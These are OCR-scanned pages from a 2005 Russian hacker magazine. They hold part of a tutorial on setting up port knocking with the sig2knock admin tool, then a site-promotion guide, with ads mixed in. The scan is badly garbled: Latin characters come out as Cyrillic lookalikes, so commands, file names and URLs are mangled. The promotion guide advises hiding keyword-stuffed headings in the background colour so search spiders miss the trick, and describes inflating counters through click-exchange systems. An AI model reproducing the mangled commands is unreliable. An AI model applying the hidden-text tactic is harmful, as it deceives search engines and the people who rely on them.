нить (ВЕ^СТ), или же проигнорировать (ОЕЫУ) пакет, отправленный на конк- 
ретный порт. С первой реакцией, думаю, все понятно, но в чем разница между 
двумя последними? В обоих случаях порт-получатель считается закрытым, то 
есть он недоступен для подключения. Если порт настроен на реакцию ВЕ^СТ, 
то сервер возвращает клиенту ІСМР-ошибку с сообщением о том, что соедине- 
ние отвергнуто. Клиенту (вернее, сканеру портов) становится ясно, что доступ 
блокируется файрволом, а на данном порте реально может крутиться какой-ни- 
будь сервис. В случае, когда для порта установлен статус ОЕЫУ, никакой реак- 
ции на соединение клиента не последует. Получается, что на данном порту нет 
никакого сервиса в принципе. Понимаешь разницу? Различные вариации я при- 
вел во врезке. Рекомендую ее посмотреть. 

[конкретные реализации] Существует довольно много реализаций 
технологии Рогі Кпоскіпд. Ее применяют в троянах, Ііпдегргіпі-тулзах 
и просто администраторских прогах, которые позволяют подключиться 
к серверу на внешне закрытый файрволом порт. В качестве примера возь- 
мем прогу, которая относится к последнему типу и называется 3102 
(ѵѵѵѵѵѵ.зесигііу.огд.зд/сосіе/рогікпоск 1 .МтІ) . Почему я ее выбрал? Да потому 
что это одна из немногих реализаций, которая имеет серверную часть од- 
новременно для ІІЫІХ, и ѴѴіпбоѵѵз-систем. Что касается других реализаций, 
рекомендую обратиться к сайту тѵѵѵ.рогікпоскіпд.огд/ѵіеѵѵ/ітріетепіаііопз. 
Более того, наиболее удачные я выделил в сноске к этой статье. 
Клиентская и серверная части 3102 распространяются с исходниками в двух 
архивах: зід 2 кпосксІ- 0 . 2 . 2 Ір и зід 2 кпоскс- 0 . 2 . 2 Ір, которые можно скачать с 
официального сайта программы или найти на нашем 0\Ю/С0. Само собой, 
нам понадобится и одно, и другое. Начнем с настройки серверной части. 

\Т\ Первое, что нужно сделать, — распаковать архив зід2кпосксІ-0.2.2Ір и пе- 
реместить содержимое папки Веіеазе в заранее подготовленную директо- 
рию, например, сАРогІКпоск. Помимо этого, нужно позаботиться о свежей 
версии драйвера ѴѴіпРсар ( шш.уѵіпрсар.огд ). Если ты не устанавливал его 
в системе, сделай это сейчас. В противном случае, 3102 работать не будет. 
\2\ Теперь, когда бинарники программы находятся в нужной директо- 
рии, можно приступать непосредственно к настройке. 3102 является 
консольным приложением, поэтому конфигурирование демона осуще- 
ствляется с помощью текстовых конфигов. Информация о пользовате- 
лях хранится в файле изег.іхі. Синтаксис предельно прост: в каждой 
строке через двоеточие указывается имя пользователя, хэш его паро- 
ля, время создания записи. Само собой, вручную генерировать запись 
не придется — для этого в дистрибутив программы входит специальная 
утилита 5ід2кпосксІ_и5егасІсІ.ехе. Просто запусти ее и введи имя пользо- 
вателя/пароль. На выходе ты получишь необходимую строчку вроде 
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конфигурационный файл ЗЮ2 — зід2кпоск<±сопІ 



зІер±рѴ-шМАѵѵ/СООЗІѴНсѴ9МѴС)==: 1099864780. Ее нужно без измене- 
ний вставить в файл изег.іхі и сохраниться. Рекомендую сразу же обоз- 
начить права доступа для этого файла, чтобы обычные пользователи 
не могли к нему обратиться. Так сказать, в целях безопасности. 

[з] Дело дошло до главного конфигурационного файла — зід2кпоскд.сопі. 
Пример рабочего конфига поставляется с программой по умолчанию, но 
объясню все подробнее. Всего в файле указывается 4 параметра: 
1ЮР_РОВТ, РОВѴѴАРЮ_ТО_ІР, РОВѴѴАВО_ТО_РОВТ, ЗІМОІ_ЕСОМЫ_РОВ- 
ТОРЕЫ_ТІМЕ. 

Первый параметр — 1ЮР_РОВТ — указывает специальный идентификаци- 
онный ІЮР-порт. В данной реализации Рогі Кпоскіпд необходим для того, 
чтобы начать процесс авторизации пользователя. Запомни этот параметр — 
он понадобится при подключении к серверу. Пусть он будет равен 1001. 
Второй и третий параметры — РОВ\Л/АВЭ_ТО_1Р и РОВѴѴАВО_ТО_РОВТ — 
указывают ІР-адрес и порт, на которые будут перенаправляться пакеты в 
случае успешной обработки Кпоск-последовательности или, иначе говоря, 
авторизации. Откроем доступ для РТР-сервера (21 порт) на локальной ма- 
шине (в качестве ІР указываем 127.0.0.1). 

С помощью четвертый параметра — ЗІЫОІЕСОЫМ_РОВТОРЕМ_ТІМЕ — 
обозначается время в секундах, в течение которого будет открыт порт. 
Конфигурация завершена. Теперь можно приступать к тестированию: для 
этого зайди в систему под аккаунтом администратора и через командную 
строку запусти файл зід2кпосксІ.ехе. Выскочит небольшая справка, любезно 
рассказывающая о том, что для работы программы необходимо указать се- 
тевой интерфейс. На экран также будет выведен список всех сетевых подк- 
лючений. Найди среди них интерфейс, относящийся к локалке или инету 
(в зависимости от того, откуда будут производиться внешние соединения), 
посмотри его номер и запусти программу с ключом зід2кпосксІ -і <номер_ин- 
терфейса>. Примерно так: С:\РогіКпоск>зід2кпосксІ -і 3. 

Подобные проги удобнее запускать как сервис, чтобы они не мозолили гла- 
за консольными окошками. Сделать это несложно: при запуске необходимо 
лишь добавить ключ -з. 

Все. Теперь Рогі Кпоскіпд-демон запущен и готов к работе. В случае успеш- 
ной авторизации он откроет случайный порт, пакеты с которого будут пере- 
направляться на РТР-сервис локальной машины. Самое время попробовать 
подключиться к нему. Клиентская часть 3102 распространяется в виде одно- 
го единственного файла — зід2кпоскс.ехе. Все необходимые параметры 
вводятся через командную строку и в интерактивном режиме, поэтому кон- 
фигурационного файла не требуется. Общий синтаксис для запуска утили- 
ты выглядит следующим образом: 

зід2кпоскс.ехе <ІР-сервер> управляющий ІЮР-порт серверах 
Ты помнишь, какой ІЮР-порт мы указали в настройках сервера? Вот имен- 
но здесь он и понадобится. То есть запускать клиент нужно примерно так: 
зід2кпоскс.ехе 192.0.0.2 1001. 

После запуска программа потребует ввести имя пользователя и его па- 
роль. Как только все необходимые данные будут введены, программа 
составит Кпоск-последовательность и выполнит необходимые попытки 
подключения к серверным портам. Этот процесс будет сопровождаться 
сообщениями типа: 







создаем учетную запись для пользователя зіер. 
Полученную строчку нужно вставить в файл изег.іхі 



Кпоск? (1 — Рогі = 2152, ІЗЫ = 691 51 В7Р) 

Кпоск? (2 — Рогі = 65060, ІЗЫ = 7Р1 54085) 

Кпоск? (3 — Рогі = 21070, ІЗЫ = 1 066Е6Е8) 

Если пароль и имя пользователя были введены правильно, очень скоро ты 
получишь сообщение Эоог із ореп аі 192.168.0.2 Рогі 47189 Іог 30 зесопсіз. 
Попробуем подключиться к нему Іеіпеі'ом: Іеіпеі 192.168.0.1 47189. 

И получаем баннер РТР-демона — «Оепеб РТР Зегѵег ѵЗ.6.0 (ВиіІсІ 23) 
геасіу...». Ура, мы действительно перенаправлены на нужный порт! 

Остается еще один вопрос: а как же поступить с файрволом, каким образом 
можно прикрыть порты? 3102 разработан для тесной интеграции с брандма- 
уэром ркіііііег (ѵѵшѵ.кізс.Меззоигсез/оиііІз/ркШег/сІоѵѵпІоасІ/). Это банальный 
пакетный фильтр, который работает подобно юниксовым файрволам и име- 
ет текстовые конфиги. Проблем с ним возникнуть не должно. 

[бонусы рогі кпоскіпд] Скрытый метод идентификации и передачи дан- 
ных на сервер, который внешне не имеет открытых портов, — одна из клю- 
чевых фишек технологии. Никаких методов по определению активной сис- 
темы Рогі Кпоскіпд на удаленной машине не существует. Идея перебирать 
различные комбинации — бред по определению. Более того, каждая такая 
атака будет замечена любой мало-мальски работающей ЮЗ и опытным ад- 
мином, просматривающим системные логи. 

Как известно, пароли к различным сервисам и даже защищенному ЗЗН, 
можно перехватить снифером. Но при использовании Рогі Кпоскіпд инфа пе- 
редается с помощью серии попыток подключения к портам, а не в обычных 
сетевых пакетах. Поэтому без знания, какая именно система используется 
для реализации этого метода, и внутренностей самой системы перехватить 
(вернее, правильно истолковать) приватные данные абсолютно невозмож- 
но. Чтобы еще больше снизить риск перехвата информации, данные можно 
«на лету» кодировать и передавать между сервером и клиентом в закрипто- 
ванном виде. Важно заметить, что шифрование поддерживается большин- 
ством реализаций технологии Рогі Кпоскіпд. 

В ІІпіх-системах интеграция технологии проходит на раз-два. Она не требует 
установки новых драйверов, изощренных файрволов и т.п. Рогі Кпоскіпд наст- 
раивается на работу со штатным файрволом и практически не требует затрат. 

[не обошлось без недостатков] Не надо думать, что использование 
Рогі Кпоскіпд — это панацея от всех бед. Для того чтобы установить подоб- 
ное соединение, серверная и клиентская части должны знать одинаковую 
Кпоск-последовательность. Алгоритм составления последовательности и 
необходимые данные нередко хранятся на жестком диске. В случае кратков- 
ременного доступа к машине эту информацию можно извлечь и потом ис- 
пользовать в корыстных целях. Наиболее безопасным вариантом считаются 
реализации клиентов, которые хранят ключи Кпоск в зашифрованном виде 
на флеш-картах (получается своеобразный ІІЗВ-кпюч), а также поддержи- 
вающие пользовательские аккаунты (как в случае рассмотренной 5102). 
Для комфортной работы технологии последовательность используемых 
портов должна быть достаточно длинной. Такой расклад обязательно приве- 
дет к увеличению потребляемого трафика и нагрузки на канал, что, естест- 
венно, не очень хорошо. 

Абсолютное большинство реализаций бессильны без файрвола, поскольку 
не работают с сетевыми пакетами напрямую, а лишь обрабатывают логи 
брандмауэра и соответствующим образом корректируют их конфиги в ответ 
на Кпоск-последовательности. Это плохо, но отсюда вытекает и еще один 
недостаток. Если произойдет сбой в работе Рогі Кпоскіпд демона, он реаль- 
но может подпортить тебе жизнь, напортачив в конфигурации файрвола. 
Вполне возможна ситуация, когда все порты будут заблокированы, и уда- 
ленно подключиться к ним будет невозможно. 

Для реализации Рогі Кпоскіпд на низком уровне необходимо интегрировать 
соответствующие функции в файрвол и пакетные фильтры. Именно поэтому 
реализации этой технологии для винды практически не существуют, в то время 
как для Ыпих и ВЗЭ, имеющих хорошие штатные файрволы, — миллион © 




идентификация клиентской машины прошла успешно. Сервер успешно 
распознал Кпоск-последовательность, поэтому на удаленном порте 
в течение 30 секунд был открыт порт 39732 








2Х СКОРОСТЬ & МОЩЬ 



Двухъядерные процессоры АМО А1И1оп ги 64 Х2 — 
эго возможность одновременной работы 
О несколькими ресурсоемкими приложениями; 
защита системы от компьютерных вирусов на 
уровне платформы; уменьшенный уровень 
энергопотребления и шума: высокая скорость 
обмена данными с оперативной памятью 
и устройствами вво да/вы вода. 



Для работы с деухъядерным процессором АМД АіМоп™ 64 Х2 
вашему компьютеру не потребуется адаптация 
программного обеспечения. 



Россия, 110121, Москва, ул, Плющиха, дом 42, теп.: ДОЭ5) 710-72-80 

г-апй-к.сот 






ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ [РС_2<ЖЕ] РЕВВІІМ НЬЮСЫ 



Успешный бизнес — 
стабильный доход! 



Про то, как правильно раскручивать сайт в Интернете 



ТЫ ОШИБСЯ, ЕСЛИ ПОДУМАЛ, ЧТО В ЭТОЙ СТАТЬЕ Я БУДУ ОПИСЫВАТЬ ОЧЕ- 
РЕДНОЙ МЕТОД ЗАРАБОТКА. В ЭТОМ НЕТ НЕОБХОДИМОСТИ, В ПРОШЛЫХ НО- 
МЕРАХ ][ Я И ДРУГИЕ АВТОРЫ ОПИСАЛИ ДОСТАТОЧНОЕ КОЛИЧЕСТВО ИНТЕРЕС- 
НЫХ МЕТОДИК. ТОЛЬКО ВОТ БУДУТ ЛИ ОНИ РАБОТАТЬ? СМОЖЕШЬ ЛИ ТЫ УС- 
ПЕШНО ПРОДАВАТЬ ХОСТИНГ ИЛИ ПРЕДОСТАВЛЯТЬ ѴРІЧ-ДОСТУП, ЕСЛИ ВСЯ 
ТВОЯ АУДИТОРИЯ — СОСЕД ВАСЬКА ИЗ КВАРТИРЫ НАПРОТИВ И ПАРА-ТРОЙКА 
ОДНОКЛАССНИКОВ? ОТВЕТ ОЧЕВИДЕН. ДЛЯ ТОГО ЧТОБЫ КАК-ТО ПОПРАВИТЬ 
СИТУАЦИЮ И ПОМОЧЬ, НАКОНЕЦ, ТЕБЕ СТАТЬ КРУТЫМ ДЯДЕЙ, КОМАНДА X И 

ПОДГОТОВИЛА ЭТУ СТАТЬЮ I Дмитриев Данил ака хЫІ (5Ігеат@озкоІпеІги, 334437228) 



ЮОІХАІ 




[с чего начать?] Готовиться к раскрутке сайта следует 
задолго до его закачки в Сеть. Как известно, более 70% по- 
сетителей приходят через поисковые сайты, такие как 
Рамблер, Яндекс, Апорт и МаіІ.ги. Из этого следует, что на- 
ша основная задача — «понравиться» поисковым роботам. 

Причем так, чтобы при выдаче запроса по ключевым словам быть на 
первой-второй позиции. Как это сделать — не знает никто. Алгоритмы 
современных поисковиков невероятно сложны, например, исходники 
поискового движка Рамблера весят более 120 Мб! Однако кое-что нам 
все-таки известно. Многие веб-маркетологи проводят своеобразные 
опыты над поисковыми роботами: создают по-разному оптимизирован- 
ные страницы и смотрят, какие позиции при выдаче запроса они займут. 
Результатами своих исследований никто из них делиться не будет, од- 
нако сегодня я сделаю для тебя исключение. 

Итак, вернемся к нашему вопросу. Начинать надо с оптимизации стра- 
ниц сайта. Имей в виду, что поспешив с публикацией сайта и регист- 
рацией в поисковиках неоптимизированной версии, ты рискуешь нес- 
колько месяцев оставаться без посетителей, так как переиндексация 
может занять немало времени. 



ЫірУ/зетопііог.ги — 
программы для раскрутки 
ШрУ/рготоіег.ги — 
полезные статьи и обзоры. 



Поэтому не спеши. Итак, как же 
оптимизировать свой сайт? Пер- 
вое — вставить в страничку тэги 
описания. Раньше поисковики 
выдавали запрос, опираясь иск- 
лючительно на содержимое спец- 
конструкций, однако из-за поис- 
ковых спамеров, которые так и 
норовили вбить в эти тэги кучу 
популярных слов, не относящихся 
к их сайтам, машины поиска 
практически свели на нет значе- 
ние таких тэгов, как теіа. Однако 
пренебрегать возможностью до- 
полнительной прибавки в весе не 
стоит. Вот НТМІ_-код, который 
должен располагаться сразу пос- 
ле тэга начала страницы (<НІтІ>): 




ог им-Аитт 






<1Ше>Заголовок страницы<ЛШе> 

<теІа [Шр-едиіѵ="СопІепІ Іапдиаде" сопІепІ=ги> 

<теІа пате=сіе5СгірІіоп сопІепІ="описание: какая инфа содержится 
на этой паге"> 

<теІа пате=кеуѵѵогсІ5 сопІепІ="ключевые слова, которые должны по- 
мочь пользователю найти твой сайт">. 




Первый тэг (<МІе>) является наиболее важным. Изо всех представлен- 
ных выше тэгов, титл — единственный, который учитывается всеми 
поисковиками. Да-да, может быть так, что тэг, который ты тюнил два 
часа, вообще поисковиком не воспримется. В вышеуказанный код ты 
должен вписать содержание и описание страницы. Тут главное не пе- 
реборщить. Если в этих тэгах будет слишком много слов, то поисковик 
может насторожиться и убавить твой рейтинг. Поэтому не надо вби- 
вать бестолковые фразы и популярные запросы типа «секс, порно, 
юмор». Этим ты только растратишь свободное пространство и сдела- 
ешь шаг по пути попадания в черный список поисковиков. Выбраться 
из этого списка поможет только смена домена. Как правильно подоб- 
рать ключевые слова, написано во врезке. 

Помимо «технических» тэгов, поисковики обращают внимание на сам 



текст страницы. И тут тоже есть приоритетные тэги, которые ценятся 
больше, чем остальные. Например, из тэгов оформления страницы по- 
исковики отдают предпочтение <И1>..<И6>, <и>, <Ь> (в порядке убыва- 
ния). Как известно, эти тэги используются для оформления заголовков. 
А что, как не заголовок, наиболее точно отражает тип контента паги? 
Для нас важно забить все эти тэги ключевыми совами. Но как это сде- 
лать? Ведь, например, ключевые слова в тэге <М> займут всю страни- 
цу, что отпугнет пользователя и потенциального клиента. Выход из дан- 
ной ситуации предельно прост. После того как ты определился с соста- 
вом ключевых слов, открой оптимизированную страницу в блокноте и 
вставь следующий код сразу после тэга <ЬосІу>: <Н1>Ключевые ело- 









сімт5 







[индекс цитируемости (ИЦ)] Показатель, который, по мнению авто- 
ра, играет ключевую роль в оценке релевантности (соответствие пользо- 
вательскому запросу) твоего сайта. Индекс цитируемости показывает 
количество сайтов, ссылающихся на тебя, а также их вес. Если ссылка 
на твой сайт стоит на пяти сайтах, то твой ИЦ равен 5. Существует такое 
понятие, как тИЦ — тематический индекс цитируемости, показывающий, 
сколько сайтов аналогичной тематики ссылаются на тебя. Проще говоря, 
если ты сделал сайт о Соипіег-Зігіке, то тематический индекс цитируе- 
мости поднимется только после того, как ссылки на тебя поставят имен- 
но игровые сайты, желательно тоже посвященные этой популярной стре- 
лялке. Если брать абсолютно одинаковые сайты, то выше окажется про- 
ект, у которого больше тИЦ, а не ИЦ, так что делай выводы, с кем ме- 
няться линками, а с кем нет. Теперь поговорим о «весе» ссылок. Каждый 
линк, проставленный на тебя, учитывается поисковиками по-разному, а 
следовательно, по-разному меняет твой ИЦ (тИЦ). Это зависит от таких 
факторов, как месторасположение ссылающегося на тебя сайта, его ИЦ 
или тИЦ, стоит ли ответная ссылка на него с твоего сайта или нет. Нап- 
ример, ссылки с сайтов, расположенных на бесплатных хостингах, почти 
не ценятся. Поэтому при обмене ссылками имей в виду, что, ставя ответ- 
ную ссылку на бесплатный сервер, ты понижаешь свой рейтинг. Сущест- 
вует зависимость: если сайт с большим 
ИЦ ставит ссылку на другой сайт, то он от- 
дает ему столько рейтинга, сколько сос- 
тавляет разница между их ИЦ. 

Существует множество способов повы- 
шения индекса цитируемости. Например, 
можно подписаться на специальную рас- 
сылку, в каждом выпуске которой публи- 
куются предложения об обмене, и далее, 
посредством переписки, договорится об 
обмене. Есть и другие способы — покупка 
баз данных с е-таіі адресами веб-масте- 
ров, участие в системах автообмена. Суть 
систем автообмена заключается в том, 
что каждому участнику выдается специальная страница (обычно это 
Ііпк.рИр). Участие в таких системах лично мне не очень понравилось, 
так как в большинстве из них участвовали сайты с низкими рейтинга- 
ми, а убрать с них ссылки было невозможно. К тому же, есть еще один 
неприятный момент. В ночное время (после 23.00) такие системы заме- 
няют все ссылки участников на собственные. Как известно, процесс ин- 
дексации поисковиками производится именно в ночное время и, следо- 
вательно, все, что увидит «паук», — тысячи сайтов, ссылающихся на 
один проект. От этого выигрывает только система автообмена. 

Помимо ИЦ, есть такой интересный показатель, как РП. Он увеличится, 
если какой-нибудь популярный сайт поставит на тебя баннер. Чем боль- 
ше баннер и популярнее сайт, тем больше будет твой РВ. 




ва</И1>. Затем открой все это в РгопІРаде и выдели текст заголовка. 
После чего в меню свойства убавь размер шрифта до минимума, сузь 
межзнаковый интервал и окрась текст в цвет фона. Эффект просто 
потрясающий: ты получил страницу с заголовками, набитыми ключевы- 
ми словами, и не испортил дизайн. Но надо проследить, чтобы между 
тэгами Н1 и ключевыми словами не было левых тэгов, которые умень- 
шают текст, иначе поисковик может запалить эту тему и забанить твой 
сайт. Также следует осторожнее работать с цветом текста и фоном. 
Нам совсем не нужно, чтобы паук пронюхал, что текст с обилием клю- 
чевых слов не виден пользователю. Чтобы этого избежать, задай цвет 
фона картинкой, а не ВОВ-кодом, так как это поможет избежать бана. 



[внешний вид] От этого зависит многое. Как бы активно ты не раскручи- 
вал сайт, ты не добьешься никакого эффекта, если его дизайн и макет будут 
некрасивыми и неудобными. Большинство веб-мастеров не захотят даже об- 
мениваться с тобой ссылками, не говоря уже о партнерстве. Посетители, за- 
подозрив тебя в непрофессионализме, не захотят покупать даже самый де- 
шевый товар, несмотря на кучу сертификатов доверия. Поэтому не скупись 
на дизайне — найми профессионалов. Немаловажную роль играет и макет 
сайта. Существует такая наука, как изаЬМИу, изучающая поведение пользова- 
теля при заходе на веб-страницу. Перед тем как открывать сайт, перечитай 
две-три книги по этой науке и посмотри, насколько твой сайт удобен пользо- 
вателям. Если человек на стандартные действия (наводит курсор на картин- 



[ХАКЕР 12 [84] 05 > РС_20ЫЕ 037 ] 






[ХАКЕР 12 [84] 05 > РС_20МЕ 038 ] 



КЛЮЧЕВЫЕ СЛОВА 

Ключевые слова — это слова, по кото- 
рым тебя будут находить пользователи. 
Именно поэтому максимально серьезно 
отнесись к их подборке. Допустим, ты 
открыл хостинг-контору. Следователь- 
но, ключевыми словами будут являться 
сочетания «хостинг, хостинг с рИр, ка- 
чественный хостинг, размещение сай- 
тов» и т.д. Основной геморрой заклю- 
чается в том, что очень трудно рассчи- 
тать, где какое словосочетание должно 
находиться. Например, если ты напи- 
шешь «хостинг с рИр, лучший хостинг», 
то потеряешь с этого два очка. Во-пер- 
вых, потому что одно и то же ключевое 
слово находится слишком близко друг 
от друга, а во-вторых, как я уже писал, 
пауки считывают из тэгов не более 20 
слов, так что надо более рационально 
расположить ключевые фразы. В дан- 



ном случае наиболее правильный ва- 
риант — «качественный хостинг с рНр» 
(без запятых). Для того чтобы выявить, 
какой подбор ключевых слов является 
наиболее удачным, веб-промоутеры 
создают несколько страниц и вбивают 
в качестве ключевых слов разные фра- 
зы. После чего проводится анализ ре- 
акции пауков: какая страница понрави- 
лась больше, те ключевые слова и бу- 
дут использоваться на всем сайте. 

Но это достаточно сложная для нович- 
ка задача, поэтому для начала будет 
уместно подглядеть у конкурентов. 

В любимом браузере Опера есть такая 
функция, как ІІзег тосіе->ЗІіоѵѵ зігис- 
{игаіз еіетепіз. Благодаря ей ты уви- 
дишь все тэги на паге, в том числе и 
содержимое тэгов <МІе> и <те1а>, та- 
кой режим позволяет быстро пройтись 
по сайтам, занимающим 1 — 5 позиции 



в поисковиках, и быстренько скопиро- 
вать их содержимое в блокнот для 
дальнейшего анализа. При анализе 
успешности подборки ключевых слов 
руководствоваться следует не только 
позицией страницы при выдаче зап- 
роса, но и другими показателями, та- 
кими, например, как ИЦ и тИЦ. Также 
стоит воспользоваться поисковиком 
Рамблер.ру. Вся фишка в том, что 
после подачи 3-его запроса в правой 
части экрана появляется врезка «у 
нас также ищут...». А ниже ты уви- 
дишь несколько десятков фраз, кото- 
рые вводили в качестве поискового 
словосочетания другие пользователи. 
Как ты понял, Сору&РазІ рулит. Хочу 
заметить, что, кроме Рамблера, клю- 
чевые слова можно надыбать в таких 
системах, как Бегун. ру и Яндекс.Ди- 
рект (о них мы говорили в статье). 



ЧТО ТАКОЕ САР И КАК ИМИ ПОЛЬЗОВАТЬСЯ? 

САР — системы активной раскрутки. Их принцип заключа- 
ется в том, что зарегистрированному на сервисе юзеру по- 
казывают во фреймах сайты заказчиков. Через каждые 30 
секунд — новый сайт. Причем платят в прямом смысле гро- 
ши, но люди идут, часто накручивая, ставя резалки графики 
и прибегая к прочим хитростям. Все организуется следую- 
щим образом: пользователь регистрируется, ему дается 
логин и пароль. После этого он авторизируется и попадает 
на страницу, где в одном из фреймов показывается сайт. 
Обычно в левой части панели располагаются кнопки, на 
которые юзер должен нажать (их список появляется там же 
на картинке — это защита от накруток). Спустя 30 секунд во 
фрейме появляется другой сайт и т.д. За каждый просмот- 
ренный сайт юзер получает кредиты, которые может потом 
продать как самой системе, так и левому покупателю. А мо- 
жет заюзать сам — кому как удобней. Обычно все просто: 

1 просмотр сайта = 1 кредиту. Тысяча кредитов стоит $1. 

То есть, чтобы твой сайт просмотрело 1000 человек, надо 
выложить один бакс. Классно, не так ли? Однако не оболь- 
щайся — юзеры не дураки — в рунете лежит пару десятков 
накрутчиков к любой системе САР, так что из 1000 сайтов 
увидят лишь 500 — 600 человек (что тоже неплохо). Счетчи- 
ки, естественно, зафиксируют ровно 1000 :). Следует 
учесть, что купленные кредиты расходуются медленно. Ес- 
ли, скажем, 1000 000 баннерных показов в сети ПІ_Е у меня 
растаяли меньше чем за 6 часов, то 1000 кредитов хватит 
на неделю точно. Юзеры постепенно теряют интерес к это- 
му виду заработка, и как следствие — снижение количества 
общих показов сети. Конечно, можно купить кредиты в нес- 
кольких системах, однако учитывай, что подавляющее чис- 
ло пользователей просматривают одновременно по 5 — 7 
систем, и гарантий, что твой сайт не будет показан семь раз 
одному и тому же человеку, нет никаких. В настоящее вре- 
мя САР можно использовать лишь как накрутчик счетчиков. 
То есть для повышения своих позиций в каталогах и рейтин- 
гах. В этом случае САР действительно эффективная вещь. 
Однако, как я уже говорил, если разные САР (услугами ко- 
торых ты воспользовался) юзают одни и те же люди, то мно- 
гие показы будут зачтены счетчиками не как уникальные 
посетители, а как хиты (то есть один и тот же посетитель хо- 
дит по разным страницам сайта). Уникалы, как известно, це- 
нятся больше. Так что делай выводы. Можно, конечно, посо- 
ветовать воспользоваться иностранными САР, так как они 
дают тестовые показы (до 10 000 штук). Из отечественных 
могу посоветовать пеозар.ш. Хоть на него и написано куча 
накрутчиков, но работают они нестабильно, а некоторые не 
работают вообще. Такие системы появляются и исчезают 
довольно часто, поэтому не покупай больше 2000 кредитов 
сразу. Бери постепенно, по мере надобности (у меня сгоре- 
ло 5000 кредитов аиіорііоі.пеі.ги, которые сами без объясне- 
ний куда-то испарились). Весь список САР можно получить 
по простому трехбуквенному запросу в поисковых системах. 








обрати внимание на правую колонку — это и есть реклама системы Яндекс 



ку, ставит галочку) получает нестандартную реакцию (внезапные редиректы, 
всплывающие окна), то у него складывается ощущение, что он потерял конт- 
роль над сайтом, а это вызывает дискомфорт. Помимо этого, стоит серьез- 
ней отнестись к внутренностям страниц. Поисковые роботы и пользователи 
любят, когда страница не содержит слишком много информации. Если ты хо- 
чешь выложить объемный материал, то целесообразней будет разбить его 
на несколько частей. Избегай использования флеша и явы, так как поиско- 
виками они не воспринимаются, и, следовательно, текст, воспроизведенный 
ими, проиндексирован не будет. Есть еще один очень популярный элемент 
верстки, который может сильно попортить тебе жизнь, — фреймы. Из-за них 
поисковые роботы могут сбиться с толку и проиндексировать всего одну 
страницу. Пользователю будет неудобно добавлять тебя в Избранное, а счет- 
чики статистики будут показывать необъективную информацию. 

[софт] Как и в других направ- 
лениях веб-дизайна, в продви- 
жении сайта используют специ- 
альный софт. Программы эти 
хоть и дорогие, зато сильно об- 
легчают работу: они берут на се- 
бя анализ успешности ключевых 
слов, сравнение твоего сайта с 
конкурентами, регистрацию про- 
екта в сотнях поисковых машин, 
а также рассылки рекламы на 
всевозможные форумы и доски 
объявлений. Все это поможет 
поднять твой сайт на несколько 
позиций вверх, но учти, что под- 
бирать и использовать эти прог- 
раммы нужно с осторожностью. 

Это касается софта, заносящего 
информацию о твоем сайте в ин- 
дексы каталогов и поисковых 
систем. Дело в том, что работа- 
ют они не всегда стабильно, а 
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софт для раскрутки 




1 .рз — регистрация в 578 каталогах. 
Стоит 20 баксов 
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Откройте для своей семьи новые способы обучения, общения 
и развлечений - приобретите персональный компьютер ФРОНТ™ 
на базе процессора Іпіеі® Репііит® 4 с технологией НТ. 
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Іпіеі , логотип Іпіеі, Іпіеі Іпзісіе, логотип Іпіеі Іпзісіе, Іпіеі Сепігіпо, логотип Іпіеі Сепігіпо, Сеіегоп, Іпіеі Хеоп, Іпіеі ЗреесІЗіер, Ііапіит, Репііит и Репііит III Хеоп 
являются товарными знаками или зарегистрированными товарными знаками корпорации Іпіеі и ее подразделений в США и других странах. 




[ХАКЕР 12 [84] 05 > РС_20ЫЕ 40 ] 




ОДы ІкІіІІ-Ц.'ЯІ 1фіІЬ-|1Ы II ІіНІІ ы ч 



■_ Т+Е Пі_Еі_ч- 



баннерная сеть ВІ_Е.ш - более 38 миллионов показов в день! 



что касается качества работы, то оно оставляет желать лучшего. Напри- 
мер, из-за глюка программа может не занести информацию о твоем сай- 
те в Рамблер или Яндекс. Сколько потенциальных клиентов не найдет 
твой сайт — думай сам. Что касается программ анализаторов ключевых 
слов, то лично я все делаю ручками и своей головой, но поначалу, ввиду 
отсутствия необходимых навыков, заюзать такой софт просто необходи- 
мо. Что же касается программ для рассылок, то применять их или не при- 
менять — вопрос скорее этический. Будь то почтовая рассылка или рас- 
сылка на форумы — все равно пользователи назовут это спамом. Конто- 
ры, рекламирующие себя этим наглым видом, вызывают у людей отри- 
цательные эмоции. 

[наружная реклама] Вспомни хотя бы один популярный проект, кото- 
рый обходился бы без баннеров, всплывающих окон или мини-кнопок. 
Большинство админов популярных сайтов выставляют на продажу свои 
рекламные площади. Поэтому первым делом необходимо пройтись по 
популярным сайтам со схожей тематикой и собрать адреса админов. Да- 
лее, посредством переписки, выбрать наиболее оптимальный для себя 
вариант. Причем мой тебе совет: покупай лучше не клики или 
показы, а сроки размещения, например, неделю или месяц. Мно- 
гие, даже крутые мастера, любят накручивать баннеры, и тебя 
могут просто кинуть. Относительно небольшой эффективностью 
обладают баннерные системы. Ты можешь как заработать 
собственные показы, участвуя в системе и разместив код на 
собственном сайте, так и купить показы других участников. Ку- 
пить их можно и у системы, но в последнем случае цена возрас- 
тет в два раза. На баннерных биржах сто тысяч показов сети ВІ_Е 
СІаззік стоят всего три бакса. Мощность открутки около 20 
тыс/час. Если твой рекламный бюджет (деньги, выделенные на 
рекламу) превышает 500 у.е., то есть смысл задуматься о сотруд- 
ничестве с такими монстрами, как Рамблер, МаіІ.ги и другими по- 
исковиками. Тысяча показов в результатах поиска у них стоит 40 
американских президентов. Отклик у такой рекламы выше, чем, 
например, в баннерных системах — 12%. 

Помимо обмена баннерами, я рекомендую обратить внимание на обмен 
текстовой рекламой. Такие системы не менее эффективны, а цены на 
порядок ниже. Например, 5000 показов стоит всего один доллар. 



Есть и так называемые системы контекстной рекламы ( Ведип.ги , 
Місзіа.ги и другие). Ты регистрируешься, вбиваешь в соответ- 
ствующие поля ключевые слова, по которым твою рекламу 
должны находить юзеры, и платишь «минималку» ($5). Далее 
эти системы разместят твое объявление на крупнейших площад- 
ках рунета. Оплата покликовая — как правило, от 5 центов за 
клик. Но учти, что в этих системах действует принцип аукциона. 
То есть тот участник, который выставит большую цену за клик, 
будет лидировать в списке. Так как большинство площадок та- 
ких систем показывает не больше двух-трех объявлений, чтобы 
твоя реклама засветилась на МаіІ.ги и других монстрах, необхо- 
димо выставить большую цену за переход. Для системы Ведип.ги 
это примерно 40 центов. Но самая известная система контек- 
стной рекламы принадлежит Яндексу. Система Яндекс.Директ 
предлагает размещать объявления в результатах поиска (задай 
любой запрос и обрати внимание на рекламу, появляющуюся в 
правой части страницы). Я лично против этой системы ничего не 
имею, но люди, которым довелось поработать с детищем Яндек- 
са, остались очень недовольны результатами работы. 

